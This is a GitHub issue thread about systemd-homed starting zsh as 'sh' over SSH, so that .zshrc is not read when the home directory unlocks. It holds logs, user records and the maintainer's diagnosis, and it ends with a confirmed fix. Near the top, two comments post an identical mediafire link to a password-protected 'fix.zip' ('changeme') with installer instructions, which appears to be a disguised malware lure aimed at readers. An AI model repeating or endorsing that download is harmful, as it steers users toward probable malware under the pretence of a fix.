### ISSUE TITLE
homed: homedir get unlocked after shell invoking

### ISSUE THREAD

**Issue by gyatpear** [systemd/systemd#34153]
### systemd version the issue has been seen with

256.5-1-arch

### Used distribution

Arch Linux

### Linux kernel version used

6.10.6-arch1-1

### CPU architectures issue was seen on

x86_64

### Component

systemd-homed

### Expected behaviour you didn't see

Homedir should be get unlocked and mounted before shell invoked

### Unexpected behaviour you saw

zsh (my default shell) started with `$HOME/.zshrc` not found and lost my shell environment customization.

If there are any existing session and homedir get mounted, zsh can read `.zshrc` file and get my environment ready on new login.

### Steps to reproduce the problem

1. Install Arch Linux (because Arch Linux has sufficient preinstalled configs for homed)
2. Create a new user with `homectl`
    ```
    (root) # homectl create foobar --shell=/usr/bin/zsh
    ```
3. Login with user `foobar` via SSH
4. Setup zsh (e.g. set prompt string in `~/.zshrc`)
5. Logout and wait the homedir get locked
6. Login again via SSH
7. prompt string not set

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by poettering** [comment]
please provide relevant logs, otherwise not actionable.

**Comment by gyatpear** [comment]
> please provide relevant logs, otherwise not actionable.

I think logs could not tell much more. Here I paste some:

```
Sep 03 03:10:24 arch-on-mac sshd-session[718]: pam_systemd_home(sshd:auth): New sd-bus connection (system-bus-pam-systemd-home-718) opened.
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: foobar: changing state inactive → activating-for-acquire
Sep 03 03:10:24 arch-on-mac systemd-homework[721]: None of the supplied plaintext passwords unlock the user record's hashed passwords.
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: Activation failed: Password for home foobar is incorrect or not sufficient for authentication.
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: foobar: changing state activating-for-acquire → inactive
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: Got notification that all sessions of user foobar ended, deactivating automatically.
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: Home foobar already deactivated, no automatic deactivation needed.
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: foobar: changing state inactive → activating-for-acquire
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Provided password unlocks user record.
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Read embedded .identity file.
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Provided password unlocks user record.
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Reconciling embedded user identity completed (host and embedded version were identical).
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Recursive changing of ownership not necessary, skipped.
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Synchronized disk.
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Moving to final mount point /home/foobar completed.
Sep 03 03:10:24 arch-on-mac systemd-homework[722]: Everything completed.
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: Home foobar is signed exclusively by our key, accepting.
Sep 03 03:10:24 arch-on-mac systemd-homed[455]: foobar: changing state activating-for-acquire → active
Sep 03 03:10:24 arch-on-mac sshd-session[718]: pam_systemd_home(sshd:auth): Home for user foobar successfully acquired.
Sep 03 03:10:24 arch-on-mac sshd-session[718]: Accepted password for foobar from 192.168.66.246 port 10344 ssh2
Sep 03 03:10:24 arch-on-mac sshd-session[718]: pam_unix(sshd:session): session opened for user foobar(uid=60347) by foobar(uid=0)
Sep 03 03:10:24 arch-on-mac sshd-session[718]: pam_systemd(sshd:session): New sd-bus connection (system-bus-pam-systemd-718) opened.
Sep 03 03:10:24 arch-on-mac systemd[1]: Created slice User Slice of UID 60347.
Sep 03 03:10:24 arch-on-mac systemd[1]: Starting User Runtime Directory /run/user/60347...
Sep 03 03:10:24 arch-on-mac systemd-logind[456]: New session 6 of user foobar.
Sep 03 03:10:24 arch-on-mac systemd[1]: Finished User Runtime Directory /run/user/60347.
Sep 03 03:10:24 arch-on-mac systemd[1]: Starting User Manager for UID 60347...
Sep 03 03:10:24 arch-on-mac (systemd)[727]: pam_systemd_home(systemd-user:account): Home for user foobar successfully acquired.
Sep 03 03:10:24 arch-on-mac (systemd)[727]: pam_warn(systemd-user:setcred): function=[pam_sm_setcred] flags=0x8002 service=[systemd-user] terminal=[] user=[foobar] ruser=[<unknown>] rhost=[<unknown>]
Sep 03 03:10:24 arch-on-mac (systemd)[727]: pam_unix(systemd-user:session): session opened for user foobar(uid=60347) by foobar(uid=0)
Sep 03 03:10:24 arch-on-mac systemd-logind[456]: New session 7 of user foobar.
Sep 03 03:10:24 arch-on-mac systemd[727]: Queued start job for default target Main User Target.
Sep 03 03:10:24 arch-on-mac systemd[727]: Created slice User Application Slice.
Sep 03 03:10:24 arch-on-mac systemd[727]: Reached target Paths.
Sep 03 03:10:24 arch-on-mac systemd[727]: Reached target Timers.
Sep 03 03:10:24 arch-on-mac systemd[727]: Starting D-Bus User Message Bus Socket...
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on GnuPG network certificate management daemon.
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on GnuPG cryptographic agent and passphrase cache (access for web browsers).
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on GnuPG cryptographic agent and passphrase cache (restricted).
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on GnuPG cryptographic agent (ssh-agent emulation).
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on GnuPG cryptographic agent and passphrase cache.
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on GnuPG public key management service.
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on p11-kit server.
Sep 03 03:10:24 arch-on-mac systemd[727]: Listening on D-Bus User Message Bus Socket.
Sep 03 03:10:24 arch-on-mac systemd[727]: Reached target Sockets.
Sep 03 03:10:24 arch-on-mac systemd[727]: Reached target Basic System.
Sep 03 03:10:24 arch-on-mac systemd[727]: Reached target Main User Target.
Sep 03 03:10:24 arch-on-mac systemd[727]: Startup finished in 191ms.
Sep 03 03:10:24 arch-on-mac systemd[1]: Started User Manager for UID 60347.
Sep 03 03:10:24 arch-on-mac systemd[1]: Started Session 6 of User foobar.
```

I think it is SSH starting zsh too early that systemd-homed is doing "unlocking" (even I did not setup any encryption there)

**Comment by gyatpear** [comment]
I have just discovered that every SSH login will make exactly one bad auth and good auth. It is just weird.

**Comment by gyatpear** [comment]
I found this issue is related to #17300 , while the unencrypted homedir get unlocked somehow with the plaintext password for logging in SSH.

On my machine, the first failure is as same as one that use pubkey to log in. Instead of asking again the password, homed get the password and unlocked the homedir.

No matter how I configure SSH or PAM, every log in via SSH will emit one bad auth event followed by a good one (examined with `homectl inspect` command).

**Comment by poettering** [comment]
sshd doesn't implement the PAM conversation hooks for its PAM session hooks, hence we cannot ask for passwords in pam_systemd. But we need to ask for passwords if the home dir is locked, simply because without a password LUKS volumes are inaccessible (that's the whole point of disk encryption after all).

Starting with v256 there's now a logic in place that homed temporarily overrides the shell path of all user records it manages as long as the home dir is not unlocked. The shell binary placed in there will then ask the user inetractively for a pw, then fully unlock the homedir and chainload the actual shell. Once the homedir is unlocked the user record reverts to the actual one, disabling this shell redirection.

In sum this means though that there will always be multiple unlock attempts if the homedir is locked and you log into ssh: at least one via PAM which fails because we cannot ask questions. And one that later succeeds via that shell tool.

Hence, afaics everything works as intended.

**Comment by gyatpear** [comment]
OK.

Then let me ask some questions further:

1. Will this "intended" behavior change in the future for smooth log in?
2. How can I debug or give you debug information about the "overriding shell" that I can only log in twice for zsh to be configured. It seems that zsh cannot read `.zshrc` from my home dir at the first time it unlocked and mounted. Then I log out, and quickly log in for a new session, and I get my custom shell prompt instead of a single $. IMHO, If the "overriding shell" does the correct thing, it should have to wait for home dir to be mounted then invoke the shell.

**Comment by poettering** [comment]
the login should always be "smooth". You just should enter two different codepaths: either we can already unlock everything via PAM (i.e. in the non-ssh case), and your login shell is invoked with everything set up right-away. or we cannot unlock via PAM, in which case you shuld get our "stub" shell instead, which asks for a pw, and then hands off to your actual login shell.

**Comment by poettering** [comment]
how does your user record look like when you are entirely logged out? and how does it look like when you are logged in via ssh and zsh was started before the home dir was setup?

please provide "userdbctl user" and "userdbctl user -j" output of both cases.

**Comment by poettering** [comment]
the logs you provided show nothing wrong, is there something missing?

how does your login via ssh look like precisely? do you get prompted for the homedir pw?

**Comment by gyatpear** [comment]
Here I tried to create a user and do some tests:

```
homectl create --storage=subvolume --shell=/bin/zsh foobar
```

### Output when user inactive

#### userdbctl user foobar

```
   User name: foobar
       State: inactive
 Disposition: regular
 Last Change: Mon 2024-09-09 12:56:32 UTC
 Last Passw.: Mon 2024-09-09 12:52:32 UTC
    Login OK: yes
 Password OK: yes
         UID: 60075
         GID: 60075 (foobar)
   Directory: / (fallback)
   Blob Dir.: /var/cache/systemd/home/foobar
     Storage: subvolume (no encryption)
  Image Path: /home/foobar.homedir
   Removable: no
       Shell: /usr/bin/systemd-home-fallback-shell (fallback)
 Mount Flags: nosuid nodev exec
   Disk Size: 900G
   Disk Free: 871.2G (= 96.8%)
  Disk Floor: 5M
Disk Ceiling: 5T
  Good Auth.: 6
   Last Good: Mon 2024-09-09 12:56:44 UTC
   Bad Auth.: 6
    Last Bad: Mon 2024-09-09 12:56:44 UTC
    Next Try: anytime
 Auth. Limit: 30 attempts per 1min
   Passwords: 1
  Local Sig.: yes
     Service: io.systemd.Home
```

#### userdbctl user -j foobar

```json
{
        "userName" : "foobar",
        "perMachine" : [
                {
                        "storage" : "subvolume",
                        "matchMachineId" : "e2ab56eacf28437a839fc0a64f1addbb"
                }
        ],
        "disposition" : "regular",
        "lastPasswordChangeUSec" : 1725886352112779,
        "privileged" : {
                "hashedPassword" : [
                        "$y$j9T$WA/gz0/A3EcuiE15OQyZh0$MdXXKgVuF5wK5hzR4ku6zye/sLlMHqhTbIyroieBXrB"
                ]
        },
        "shell" : "/bin/zsh",
        "lastChangeUSec" : 1725886592138922,
        "signature" : [
                {
                        "data" : "Jla7BTmqa56DoVI5nxpWDmvW9NwNhzyLI9rv0R6CiLO+DMNPlGbrDlESgQOU+E9rt8YSfuK7pECA1OixrnnNAQ==",
                        "key" : "-----BEGIN PUBLIC KEY-----\nMCowBQYDK2VwAyEATAx9lAY4zqNLqTjzumwqBJaLythKDhJxEzjRmRGFA2c=\n-----END PUBLIC KEY-----\n"
                }
        ],
        "binding" : {
                "e2ab56eacf28437a839fc0a64f1addbb" : {
                        "blobDirectory" : "/var/cache/systemd/home/foobar",
                        "imagePath" : "/home/foobar.homedir",
                        "fileSystemType" : "btrfs",
                        "homeDirectory" : "/home/foobar",
                        "uid" : 60075,
                        "gid" : 60075,
                        "storage" : "subvolume"
                }
        },
        "status" : {
                "e2ab56eacf28437a839fc0a64f1addbb" : {
                        "badAuthenticationCounter" : 6,
                        "lastBadAuthenticationUSec" : 1725886604462209,
                        "rateLimitBeginUSec" : 1725886579700880,
                        "rateLimitCount" : 6,
                        "goodAuthenticationCounter" : 6,
                        "lastGoodAuthenticationUSec" : 1725886604537357,
                        "state" : "inactive",
                        "service" : "io.systemd.Home",
                        "useFallback" : true,
                        "fallbackShell" : "/usr/bin/systemd-home-fallback-shell",
                        "fallbackHomeDirectory" : "/",
                        "diskSize" : 966367641600,
                        "diskFree" : 935478718464,
                        "diskCeiling" : 5497558138880,
                        "diskFloor" : 5242880,
                        "signedLocally" : true,
                        "fileSystemType" : "btrfs"
                }
        }
}
```

### Output when user is active

#### userdbctl user foobar

```
   User name: foobar
       State: active
 Disposition: regular
 Last Change: Mon 2024-09-09 12:56:32 UTC
 Last Passw.: Mon 2024-09-09 12:52:32 UTC
    Login OK: yes
 Password OK: yes
         UID: 60075
         GID: 60075 (foobar)
   Directory: /home/foobar
   Blob Dir.: /var/cache/systemd/home/foobar
     Storage: subvolume (no encryption)
  Image Path: /home/foobar.homedir
   Removable: no
       Shell: /bin/zsh
 Mount Flags: nosuid nodev exec
   Disk Size: 900G
   Disk Free: 871.2G (= 96.8%)
  Disk Floor: 5M
Disk Ceiling: 5T
  Good Auth.: 7
   Last Good: Mon 2024-09-09 13:01:30 UTC
   Bad Auth.: 7
    Last Bad: Mon 2024-09-09 13:01:30 UTC
    Next Try: anytime
 Auth. Limit: 30 attempts per 1min
   Passwords: 1
  Local Sig.: yes
     Service: io.systemd.Home
```

#### userdbctl user -j foobar
```json
{
        "userName" : "foobar",
        "perMachine" : [
                {
                        "storage" : "subvolume",
                        "matchMachineId" : "e2ab56eacf28437a839fc0a64f1addbb"
                }
        ],
        "disposition" : "regular",
        "lastPasswordChangeUSec" : 1725886352112779,
        "privileged" : {
                "hashedPassword" : [
                        "$y$j9T$WA/gz0/A3EcuiE15OQyZh0$MdXXKgVuF5wK5hzR4ku6zye/sLlMHqhTbIyroieBXrB"
                ]
        },
        "shell" : "/bin/zsh",
        "lastChangeUSec" : 1725886592138922,
        "signature" : [
                {
                        "data" : "Jla7BTmqa56DoVI5nxpWDmvW9NwNhzyLI9rv0R6CiLO+DMNPlGbrDlESgQOU+E9rt8YSfuK7pECA1OixrnnNAQ==",
                        "key" : "-----BEGIN PUBLIC KEY-----\nMCowBQYDK2VwAyEATAx9lAY4zqNLqTjzumwqBJaLythKDhJxEzjRmRGFA2c=\n-----END PUBLIC KEY-----\n"
                }
        ],
        "binding" : {
                "e2ab56eacf28437a839fc0a64f1addbb" : {
                        "blobDirectory" : "/var/cache/systemd/home/foobar",
                        "imagePath" : "/home/foobar.homedir",
                        "fileSystemType" : "btrfs",
                        "homeDirectory" : "/home/foobar",
                        "uid" : 60075,
                        "gid" : 60075,
                        "storage" : "subvolume"
                }
        },
        "status" : {
                "e2ab56eacf28437a839fc0a64f1addbb" : {
                        "badAuthenticationCounter" : 7,
                        "lastBadAuthenticationUSec" : 1725886890593255,
                        "rateLimitBeginUSec" : 1725886890581275,
                        "rateLimitCount" : 2,
                        "goodAuthenticationCounter" : 7,
                        "lastGoodAuthenticationUSec" : 1725886890669522,
                        "state" : "active",
                        "service" : "io.systemd.Home",
                        "useFallback" : false,
                        "fallbackShell" : "/usr/bin/systemd-home-fallback-shell",
                        "fallbackHomeDirectory" : "/",
                        "diskSize" : 966367641600,
                        "diskFree" : 935478718464,
                        "diskCeiling" : 5497558138880,
                        "diskFloor" : 5242880,
                        "signedLocally" : true,
                        "fileSystemType" : "btrfs"
                }
        }
}
```

Seems no critical differences.

And this time I have inspected the process and found something.

When a user logs in via SSH from inactive, zsh is invoked as `sh`:

```
# ps -fU foobar
UID          PID    PPID  C STIME TTY          TIME CMD
foobar      1369       1  0 13:07 ?        00:00:00 /usr/lib/systemd/systemd --user
foobar      1370    1369  0 13:07 ?        00:00:00 (sd-pam)
foobar      1377    1360  0 13:07 ?        00:00:00 sshd-session: foobar@pts/2
foobar      1378    1377  0 13:07 pts/2    00:00:00 -sh
# stat /proc/1378/exe
  File: /proc/1378/exe -> /usr/bin/zsh
  Size: 0               Blocks: 0          IO Block: 1024   symbolic link
Device: 0,22    Inode: 21003       Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (60075/  foobar)   Gid: (60075/  foobar)
Access: 2024-09-09 13:10:41.212851223 +0000
Modify: 2024-09-09 13:10:41.212851223 +0000
Change: 2024-09-09 13:10:41.212851223 +0000
 Birth: -
# cat /proc/1378/cmdline
-sh
```

And if this use logs in when his home is active:

```
# ps -fU foobar
UID          PID    PPID  C STIME TTY          TIME CMD
foobar      1369       1  0 13:07 ?        00:00:00 /usr/lib/systemd/systemd --user
foobar      1370    1369  0 13:07 ?        00:00:00 (sd-pam)
foobar      1414    1406  0 13:14 ?        00:00:00 sshd-session: foobar@pts/2
foobar      1415    1414  0 13:14 pts/2    00:00:00 -zsh
# stat /proc/1415/exe
  File: /proc/1415/exe -> /usr/bin/zsh
  Size: 0               Blocks: 0          IO Block: 1024   symbolic link
Device: 0,22    Inode: 21053       Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (60075/  foobar)   Gid: (60075/  foobar)
Access: 2024-09-09 13:14:34.930120152 +0000
Modify: 2024-09-09 13:14:34.930120152 +0000
Change: 2024-09-09 13:14:34.930120152 +0000
 Birth: -
# cat /proc/1415/cmdline
-zsh
```

I am not sure now the issue is on systemd-homed or OpenSSH, even PAM or some other things.

**Comment by gyatpear** [comment]
> the login should always be "smooth". You just should enter two different codepaths: either we can already unlock everything via PAM (i.e. in the non-ssh case), and your login shell is invoked with everything set up right-away. or we cannot unlock via PAM, in which case you shuld get our "stub" shell instead, which asks for a pw, and then hands off to your actual login shell.

However I am looking for some ways to, if the user has right access, make homed to directly mount the volume unencrypted.

**Comment by gyatpear** [comment]
> Seems no critical differences.

Oh no I found `useFallback` is true when it is inactive. Is this means the stub shell `homectl` (a.k.a. `systemd-home-fallback-shell`) is doing wrong?

**Comment by poettering** [comment]
> Seems no critical differences.

useFallback suggests that everything looks right. when inactive useFallback is true. When active it is false. Which is what should happen.

**Comment by poettering** [comment]
hmm, if you switch (temporarily) to bash, do things work better then? maybe this is simply some issue around the way we chainload zsh?

**Comment by poettering** [comment]
> When a user logs in via SSH from inactive, zsh is invoked as `sh`:

I prepped a fix for that in #34345. Can you give that a whirl? maybe it already improves the situation for you.

**Comment by gyatpear** [comment]
> > When a user logs in via SSH from inactive, zsh is invoked as `sh`:
> 
> I prepped a fix for that in #34345. Can you give that a whirl? maybe it already improves the situation for you.

I think this would help. Since zsh has `sh` compatibility mode. 
<https://zsh.sourceforge.io/Doc/Release/Invocation.html#Compatibility>

> hmm, if you switch (temporarily) to bash, do things work better then? maybe this is simply some issue around the way we chainload zsh?

When bash is invoked as "-ash", it assumes it is the login shell and not as POSIX shell.

**Comment by poettering** [comment]
Ah! Interesting. Then I guess that fix indeed should fix your issue. Can you check?

**Comment by gyatpear** [comment]
> > When a user logs in via SSH from inactive, zsh is invoked as `sh`:
> 
> I prepped a fix for that in #34345. Can you give that a whirl? maybe it already improves the situation for you.

I pull the latest code and compiled, it worked for me. thx

**Comment by poettering** [comment]
excellent! thanks!

Closing.
